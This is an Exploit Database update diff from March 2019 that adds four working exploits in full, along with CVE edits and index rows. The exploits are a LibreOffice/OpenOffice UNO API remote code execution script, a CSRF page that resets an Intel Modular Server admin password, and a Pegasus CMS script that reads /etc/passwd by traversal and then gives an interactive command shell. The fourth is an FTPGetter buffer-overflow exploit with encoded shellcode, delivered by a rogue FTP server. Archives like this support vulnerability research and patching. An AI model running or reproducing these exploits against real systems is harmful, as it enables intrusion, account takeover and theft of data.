DB: 2019-03-15

6 changes to exploits/shellcodes

Microsoft Windows - .reg File / Dialog Box Message Spoofing
Microsoft Windows - '.reg' File / Dialog Box Message Spoofing
FTPGetter Standard 5.97.0.177 - Remote Code Execution
Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution
Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)
Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution

exploits/java/webapps/45158.txt

@@ -6,7 +6,7 @@
 # Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
 # Affected Version: 6.6
 # Tested on: Parrot OS
-# CVE : N/A
+# CVE : 2019-8982
  
 # Description
 # Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an 

exploits/multiple/remote/46544.py

@@ -0,0 +1,70 @@
+"""
+# Exploit Title: Apache UNO API RCE
+# Date: 2018-09-18
+# Exploit Author: sud0woodo
+# Vendor Homepage: https://www.apache.org/
+# Software Link: https://www.openoffice.org/api/
+# Version:
+
+LibreOffice Version: 6.1.2 / OpenOffice 4.1.6
+
+(but really any version with the UNO API included)
+# Tested on:
+
+Ubuntu Mate 18.04 with kernel 4.15.0-34-generic (but works platform independent)
+
+Proof of Concept code attached as .txt file.
+
+HackDefense advisory:
+https://hackdefense.com/blog/security-advisory-rce-in-apache-uno-api/
+
+HackDefense blogpost:
+https://hackdefense.com/blog/finding-RCE-capabilities-in-the-apache-uno-api/
+
+Unauthenticated RCE LibreOffice/OpenOffice with UNO API
+
+This code represents a small proof of concept of an unauthenticted remote code execution using
+the Apache OpenOffice UNO API (https://www.openoffice.org/udk/). This code has been tested
+against LibreOffice Version: 6.1.1.2 on a Ubuntu Mate 18.04 with kernel 4.15.0-34-generic.
+
+For this PoC to work the target machine needs to run the ServiceManager using an external 
+interface. The following command was used to test this PoC:
+
+[Ubuntu]
+Open a terminal and execute the following command:
+    soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service'
+
+The above command will start the LibreOffice ServiceManager but this can be executed with the --invisible
+flag to prevent the dialogbox from popping up on the target.
+
+I also made a scanner available that can be used to check for the presence of the StarOffice manager running on a machine: 
+
+https://sud0woodo.sh/2019/03/06/building-a-go-scanner-to-search-externally-reachable-staroffice-managers/
+"""
+
+import uno
+from com.sun.star.system import XSystemShellExecute
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument('--host', help='host to connect to', dest='host', required=True)
+parser.add_argument('--port', help='port to connect to', dest='port', required=True)
+
+args = parser.parse_args()
+# Define the UNO component
+localContext = uno.getComponentContext()
+
+# Define the resolver to use, this is used to connect with the API
+resolver = localContext.ServiceManager.createInstanceWithContext(
+				"com.sun.star.bridge.UnoUrlResolver", localContext )
+
+# Connect with the provided host on the provided target port
+print("[+] Connecting to target...")
+context = resolver.resolve(
+	"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
+    
+# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
+service_manager = context.ServiceManager
+print("[+] Connected to {0}".format(args.host))
+shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
+shell_execute.execute("calc.exe", '',1)

exploits/php/webapps/46531.html

@@ -6,7 +6,7 @@
 # Software Link: https://sourceforge.net/projects/pilus/files/PiLUS/1.4.1/PiLUS-1.4.1-Ubiungu-stable.zip/download
 # Version: 1.4.1
 # Tested on: ParrotOS
-# CVE : N/A
+# CVE : 2019-9769
 
 PilusCart 1.4.1 is vulnerable to CSRF attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted that will add a new user as administrator.
 

exploits/php/webapps/46541.html

@@ -0,0 +1,71 @@
+<!--
+
+Intel Modular Server System 10.18 CSRF Change Admin Password Exploit
+
+
+Vendor: Intel Corporation
+Product web page: https://www.intel.com
+Affected version: 10.18.100.20130627.38849
+                  5.5.100.20091202.19584
+
+Summary: The Intel Modular Server System is a blade system manufactured by
+Intel using their own motherboards and processors. The Intel Modular Server
+System consists of an Intel Modular Server Chassis, up to six diskless Compute
+Blades, an integrated storage area network (SAN), and three to five Service
+Modules.
+
+Desc: The application interface allows users to perform certain actions via
+HTTP requests without performing any validity checks to verify the requests.
+This can be exploited to perform certain actions with administrative privileges
+if a logged-in user visits a malicious web site.
+
+Tested on: lighttpd/1.4.30
+           lighttpd/1.4.21
+           PHP/5.3.10
+           PHP/5.2.2
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5514
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5514.php
+
+
+11.03.2019
+
+-->
+
+
+<html>
+  <body>
+  <script>history.pushState('', 't00t', 'index.php')</script>
+    <form action="https://192.168.1.17:444/users/?table=User&UserId=1&action=edit&template=none" method="POST">
+      <input type="hidden" name="_dbTable[User][1][UserId]" value="1" />
+      <input type="hidden" name="_dbTable[User][1][Username]" value="admin" />
+      <input type="hidden" name="_dbTable[User][1][AuthMethod]" value="Local" />
+      <input type="hidden" name="_dbTable[User][1][Password][update]" value="on" />
+      <input type="hidden" name="_dbTable[User][1][Password][new]" value="(ontrol!23" />
+      <input type="hidden" name="_dbTable[User][1][Password][confirm]" value="(ontrol!23" />
+      <input type="hidden" name="_dbTable[User][1][AlertEmail]" value="lab@zeroscience.mk" />
+      <input type="hidden" name="_dbTable[User][1][CriticalEmail]" value="" />
+      <input type="hidden" name="_dbTable[User][1][Phone]" value="031-337-101" />
+      <input type="hidden" name="_dbTable[User][1][Locked]" value="0" />
+      <input type="hidden" name="action" value="Update" />
+      <input type="hidden" name="_dbTable[UserRights][21][Alerts]" value="3" />
+      <input type="hidden" name="_dbTable[UserRights][22][Alerts]" value="3" />
+      <input type="hidden" name="_dbTable[UserRights][23][Alerts]" value="3" />
+      <input type="hidden" name="_dbTable[UserRights][24][Alerts]" value="3" />
+      <input type="hidden" name="_dbTable[UserRights][25][Alerts]" value="3" />
+      <input type="hidden" name="_dbTable[UserRights][26][Alerts]" value="3" />
+      <input type="hidden" name="_dbTable[UserRights][27][Alerts]" value="3" />
+      <input type="hidden" name="_dbTable[UserRights][28][Alerts]" value="3" />
+      <input type="hidden" name="_dbTable[UserRights][29][Alerts]" value="3" />
+      <input type="hidden" name="_dbTable[UserRights][247][Alerts]" value="3" />
+      <input type="hidden" name="DbTable" value="User" />
+      <input type="hidden" name="DbTableKey" value="1" />
+      <input type="submit" value="Do et!" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/46542.py

@@ -0,0 +1,107 @@
+# Exploit Title: Pegasus extra_fields.php Plugin Remote Code Execution
+# Date: 14 March 2019
+# Exploit Author: R3zk0n
+# Vendor Homepage: https://www.wisdom.com.au/web/pegasus-cms
+# Software Link: N/A
+# Version: 1.0
+# Tested on: Linux
+# CVE : N/A
+
+The Pegasus CMS is vulnerable to directory travaseral and Remote code execution due to the way the extra_fields.php plugin functions. 
+
+The Plugin can be exploited using the safer eval trick linked below http://justanotherhacker.com/2016/04/analysis_of_the_safer_eval_rce_aka__the_wahckon_bug.html to obtain remote code execution
+
+Exploit attached below:
+
+#Eval is secure.. not really.
+# These Greetz to people who are smart, Wireghoul, Nano, Silverly, m3mantra, and leostat. and z3al
+requests.packages.urllib3.disable_warnings()
+banner = '''
+Welcome to the DANGER ZONE.
+                                  ;;J,ss,g,;
+                          ,s#@##"""77"^""77""@@Mw,
+                      ,#@#C7:             ,,     *^*@@@w
+                   ;@#7.             ;#@#.     ]ssmMMm#@@@m,
+                ,##\`        ,<   ,@@@@Q ,,#@#*7` ;s@@@@@@@@@Q
+              ;@#`         ]@C  ;@@@@@@@@@@"\  ;@@@@@@@@@@@@@@@m
+             @#\          #@@w#@@@@@@@@@@#~   @@@#M5"7j5#@@@@@@@@Q
+           ;@C           @@@@@@@@@@@@@@#\    @#\,           *77@@@k
+          ##.           #@@@@@@@@@@@@@#     '*                  {@@@
+         @#`          a@@@@@@@@@@@@@@L                           *%@@
+        {@*        ]@@@@@@@@@@@@@@#C*                              "@@
+       .@b;,s#@@@@@@@#@@#@@@@@@#C*                   ;s#@@@@@@m,    j@b
+       @@@#@@@@@@@@@@@@@@@@@@#C    =*        ,ppJJs#@@@@@@@@@@@@@k   @@
+       @#1@@@@@@@@@@@@@@@@#W~             ;@QQ@@@@@@@@@#` `|7@@@@~ ]@p
+       @[ @@5"@@@@@@@@@@#~            s@@@@@####@@@@@#\         @@@b ]@b
+       @[  @   j@@@@@@@@~]#"7        "@@#"\      7@@C           @@@b ]@b
+       @@       @@@@@@@@@@c           ^@@         ]@          ,@@@#  @@b
+       @@~  @   @@@@@@@@@@@b                      @#        a@@@@"  ]@@
+       j@Q  @@@@@@@@@@@@@@@@o        ,J          ]\      s@@@@#"`  ]@@L
+        ]@b ]@@@@@@@@@@@@@@@@o     ,@@@@>             ;@@@@@#^    #@@#
+         @@Q """%*577"%@@@@@@#   ]@@@@@C            ;@@@@#C     ;@@@#*
+          %@m          @@@@@@@  .@@@@@#            {@@@@@>    s@@@@#*
+           7@@        @@M@@@@@k ^@@@"#             @@@@@@@@@@@@@@@#
+            *@@m     @@bj@@@b@@@o|"^]#              %@@@@@@#M7@@#^
+              7@@m   "#  @@# @@7@@@@@@~               ^||:`,#@#C
+                ^%@@m j   @b j# \@@@@@@                 ,#@@#
+                  `7@@@mJ  7  '  |%@@@@@m,     -g,ss#@@@@#C
+                     `7%@@@Mm,     `7"%####@@MMMM#@@@#M7.
+                          ^7@@@@@@@@@@@@@@@@@@@@#MT^:
+                                `~^"7""""7^\*:
+Chimeria Exploit.
+pegausCMS Exploit's.
+'''
+
+
+print banner
+
+
+raw_url = raw_input("Please enter a domain name: \n")
+
+
+def dir_Trav(raw_url):
+    print "Checking for directory travseral..\n"
+    dir_list = requests.get("https://www."+ raw_url + "/file/includes/template/inc/test.cgi?&filename=/../../../../../../../../etc/passwd", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Connection": "close", "Cache-Control": "max-age=0"})
+    print dir_list.content
+    return
+print "Trying to execute directory travseral"
+dir_Trav(raw_url)
+r = requests.get("http://" + raw_url)
+print "Checking Status code: %s" % r.status_code
+if r.status_code == 200:
+    print "Connected"
+    print "Checking is using vulnerable CMS."
+    vuln = "http://" + raw_url + "/file/includes/plugins/globalFields/submit.php"
+    b = requests.get("http://" + raw_url + "/file/includes/plugins/globalFields/submit.php")
+    print "Checking CMS Status: %s " % b.status_code
+    if b.status_code == 200:
+        print "Seems exploitable.. Lets try to list the files!"
+
+
+
+        print raw_url
+        list_files = requests.post("http://www."+ raw_url +"/file/includes/plugins/extra_fields/submit.php", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}, data={"action": "passthru(\"ls -lah\");exit;phpinfo"})
+        print list_files.content
+        status = list_files.status_code
+        while status == 200:
+            try:
+                ShellCheck = raw_input("Shell>").strip()
+
+                Shell = requests.post("http://www."+ raw_url +"/file/includes/plugins/extra_fields/submit.php", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}, data={"action": "passthru(\"{}\");exit;phpinfo".format(ShellCheck)})
+
+                print Shell.content
+                if ShellCheck == "exit":
+                    sys.exit(0)
+            except KeyboardInterrupt:
+                print "Your exited bye"
+                sys.exit(0)
+
+    else:
+        print "Connected but does not seem exploitable. \n"
+        print "Bye!!!!!!!!!! \n"
+
+
+
+
+else:
+    print "Not connected"

exploits/windows/remote/46543.py

@@ -0,0 +1,159 @@
+# Exploit Title: FTPGetter Standard - v.5.97.0.177 Remote Code Execution
+# Date: 05/03/2019
+# Exploit Author: https://github.com/w4fz5uck5 | @w4fz5uck5
+# Vendor Homepage: https://www.ftpgetter.com
+# Software Link: https://www.ftpgetter.com/ftpgetter_setup.exe
+# Version: v.5.97.0.177
+# Tested on: Windows 7 x64
+# CVE : CVE-2019-9760
+
+
+import socket
+import struct
+import time
+import sys
+
+# badchars = (
+#   "\x59\x5a\x5b\x5c\x00\x0a\x0d\x20\x40\x1a\x80\x82\x83\x84\x85\x86\x87"
+#   "\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b"
+#   "\x9c\x9e\x9f\xc0\xc1" .....
+#  )
+
+# x86/alpha_mixed simple fixer -> bytes "\x89\xe3\xd9\xe1\xd9\x73\xf4"
+calc =  ""                      
+calc += "\x54"                               # push esp
+calc += "\x58"                               # pop eax
+calc += "\x05\x43\x06\x00\x00"    # add eax,0x643
+calc += "\x50"                               # push eax
+calc += "\x5f"                                # pop edi
+calc += "\x25\x4A\x4D\x4E\x55"   # zerout EAX
+calc += "\x25\x35\x32\x31\x2A"    # zerout EAX
+calc += "\x04\xab"                         # ADD AL,0xab
+calc += "\x31\x07"                         # XOR DWORD PTR DS:[EDI],EAX
+calc += "\x31\x47\x01"                  # XOR DWORD PTR DS:[EDI+1],EAX
+calc += "\x31\x47\x02"                  # XOR DWORD PTR DS:[EDI+2],EAX
+calc += "\x2C\x5B"                       # SUB AL,0x5b -> EAX = 0x50
+calc += "\x31\x47\x03"                 # XOR DWORD PTR DS:[EDI+3],EAX
+calc += "\x31\x47\x04"                 # XOR DWORD PTR DS:[EDI+4],EAX
+calc += "\x90\x90\x90\x90"          # padding
+
+# "\x89\xe3"
+calc += "\x54"                              # push esp
+calc += "\x5b"                              # pop ebx
+
+# "\xd9\xe1\xd9" xored: 0xab
+calc += "\x72\x4a\x72"
+
+# \x73\xf4 xored: 0x50
+calc += "\x23\xa4"              
+
+calc += "\x58\x50\x59\x49\x49\x49"
+calc += "\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33"
+calc += "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41"
+calc += "\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41"
+calc += "\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a"
+calc += "\x4a\x49\x58\x59\x48\x4b\x4f\x4e\x48\x39\x47\x53\x45"
+calc += "\x37\x56\x51\x38\x59\x32\x54\x51\x34\x5a\x54\x51\x4a"
+calc += "\x51\x39\x4f\x39\x58\x31\x45\x43\x56\x51\x53\x42\x35"
+calc += "\x49\x4b\x33\x48\x42\x55\x54\x45\x53\x43\x42\x45\x45"
+calc += "\x31\x4b\x58\x56\x50\x56\x4d\x33\x39\x59\x32\x51\x4a"
+calc += "\x5a\x32\x42\x4b\x31\x4d\x32\x43\x45\x4b\x32\x44\x4b"
+calc += "\x4e\x53\x4d\x31\x49\x50\x38\x59\x34\x4b\x55\x31\x49"
+calc += "\x30\x54\x51\x5a\x47\x55\x53\x57\x31\x4d\x54\x53\x4c"
+calc += "\x59\x4b\x49\x42\x49\x38\x4d\x4a\x5a\x37\x4f\x4a\x33"
+calc += "\x58\x34\x50\x4b\x4b\x51\x4b\x5a\x48\x4e\x4d\x42\x50"
+calc += "\x53\x4b\x46\x48\x4e\x53\x4b\x36\x35\x58\x42\x44\x4e"
+calc += "\x4c\x30\x52\x54\x4e\x4c\x4d\x59\x4d\x46\x4d\x37\x4c"
+calc += "\x37\x4c\x4f\x50\x4b\x4c\x4f\x4c\x4c\x42\x57\x53\x49"
+calc += "\x38\x58\x57\x4d\x44\x32\x4e\x57\x53\x38\x59\x5a\x43"
+calc += "\x33\x35\x49\x44\x43\x35\x4c\x32\x45\x4b\x5a\x49\x35"
+calc += "\x59\x51\x4a\x35\x4c\x50\x39\x4f\x4d\x41\x41"
+
+# Encode addresses and create jmp esp
+# Calculate jmp esp offset and put it on stack
+jump_back =  "\x55"                               # push ebp
+jump_back += "\x58"                              # pop eax
+jump_back += "\x05\x2b\x08\x00\x00"   # add eax,2091
+jump_back += "\x50"                              # push eax
+
+# zerout EAX
+jump_back += "\x25\x4A\x4D\x4E\x55"  # and  eax, 0x554e4d4a
+jump_back += "\x25\x35\x32\x31\x2A"   # and  eax, 0x2a313235
+
+jump_back += "\x3E\x33\x04\x24"          # XOR EAX,DWORD PTR DS:[ESP] -> send stack addr to EAX
+jump_back += "\x50"                               # push eax
+jump_back += "\x5f"                                # pop edi
+
+# zerout EAX
+jump_back += "\x25\x4A\x4D\x4E\x55"  # and  eax, 0x554e4d4a
+jump_back += "\x25\x35\x32\x31\x2A"   # and  eax, 0x2a313235
+
+jump_back += "\x04\x81"                    # ADD AL,0x81
+jump_back += "\x31\x07"                    # XOR DWORD PTR DS:[EDI],EAX
+jump_back += "\x31\x47\x01"             # XOR DWORD PTR DS:[EDI+1],EAX
+jump_back += "\x90\x90\x90\x90"      # padding
+
+# Tool utilized: https://github.com/ihack4falafel/Slink
+# All rights reserved to ihack4falafel
+#
+# \x54\x58\x66\x05\x04\x06\x50\xc3
+jump_back += "\x25\x4A\x4D\x4E\x55"   # and  eax, 0x554e4d4a
+jump_back += "\x25\x35\x32\x31\x2A"    # and  eax, 0x2a313235
+jump_back += "\x05\x02\x03\x30\x62"    # add  eax, 0x62300302
+jump_back += "\x05\x02\x03\x20\x61"    # add  eax, 0x61200302
+jump_back += "\x50"                               # push eax
+jump_back += "\x25\x4A\x4D\x4E\x55"  # and  eax, 0x554e4d4a
+jump_back += "\x25\x35\x32\x31\x2A"   # and  eax, 0x2a313235
+jump_back += "\x05\x32\x34\x33\x03"   # add  eax, 0x03333432
+jump_back += "\x05\x22\x24\x33\x02"   # add  eax, 0x02332422
+jump_back += "\x50"                              # push eax
+
+# jump to second shellcode
+jump_back += "\x7e\x65"                       # jmp esp xored: 0x81
+
+# Overflow size 493
+payload =  "\x90" * 29
+payload += calc                                        # shellcode
+payload += "\x90" * (493 - len(payload))  # padding
+payload += "\x7e\x06\x90\x90"                # NSEH
+payload += "\x31\x20\x77\x00"                # SEH -> POP ESI # POP EBX # RETN
+payload += "\x90\x90\x90\x90"
+payload += jump_back                            # jump to our calc
+payload += "\x90" * 700                          # Final padding
+
+try:
+    host, port = "0.0.0.0", 21
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind((host, int(port)))
+    s.listen(5)
+    print "[*] Listening server at port: {}".format(port)
+    print "[*] Waiting for the client!.."
+   
+except Exception as e:
+    print "[-] Failed attempt to create bind socket!"
+    sys.exit(0)
+   
+try:
+    conn, client = s.accept()
+    conn.send("220 Welcome to server !\r\n")
+    conn.recv(1024)
+   
+    print "[+] User started communication with server!"
+    conn.send("331 anonymous OK!\r\n")
+    conn.recv(1024)
+    print "[+] Received anonymous user from the client!"
+   
+    print "[*] CALC shellcode Length: " + str(len(calc))
+    print "[*] Jump Back shellcode Length: " + str(len(jump_back))
+    print "[*] Payload final size: " + str(len(payload))
+    print "[!] Attempting to send payload!..."
+    conn.send("230 " + payload + "\r\n")
+
+    time.sleep(1)
+    print "[+] You should have your poped calc!"
+
+    conn.close()
+    s.close()
+except:
+    print "[-] Failed attempt to send payload!"
+sys.exit(0)

files_exploits.csv

@@ -6353,7 +6353,7 @@ id,file,description,date,author,type,platform,port
 46504,exploits/android/dos/46504.txt,"Android - getpidcon() Usage in Hardware binder ServiceManager Permits ACL Bypass",2019-03-06,"Google Security Research",dos,android,
 46529,exploits/linux/dos/46529.c,"Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak",2019-03-11,wally0813,dos,linux,
 46532,exploits/windows/dos/46532.py,"Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)",2019-03-12,Hodorsec,dos,windows,21
-46533,exploits/windows/dos/46533.txt,"Microsoft Windows - .reg File / Dialog Box Message Spoofing",2019-03-13,hyp3rlinx,dos,windows,
+46533,exploits/windows/dos/46533.txt,"Microsoft Windows - '.reg' File / Dialog Box Message Spoofing",2019-03-13,hyp3rlinx,dos,windows,
 46534,exploits/windows/dos/46534.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
 46535,exploits/windows/dos/46535.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
@@ -17251,6 +17251,8 @@ id,file,description,date,author,type,platform,port
 46516,exploits/multiple/remote/46516.py,"OpenSSH SCP Client - Write Arbitrary Files",2019-01-11,"Harry Sintonen",remote,multiple,
 46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,
 46540,exploits/windows/remote/46540.py,"Apache Tika-server < 1.18 - Command Injection",2019-03-13,"Rhino Security Labs",remote,windows,
+46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows,
+46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40983,3 +40985,5 @@ id,file,description,date,author,type,platform,port
 46531,exploits/php/webapps/46531.html,"PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)",2019-03-12,"Gionathan Reale",webapps,php,80
 46537,exploits/php/webapps/46537.txt,"WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion",2019-03-13,"Manuel García Cárdenas",webapps,php,80
 46538,exploits/php/webapps/46538.txt,"pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting",2019-03-13,"Gionathan Reale",webapps,php,443
+46541,exploits/php/webapps/46541.html,"Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)",2019-03-14,LiquidWorm,webapps,php,
+46542,exploits/php/webapps/46542.py,"Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution",2019-03-14,R3zk0n,webapps,php,80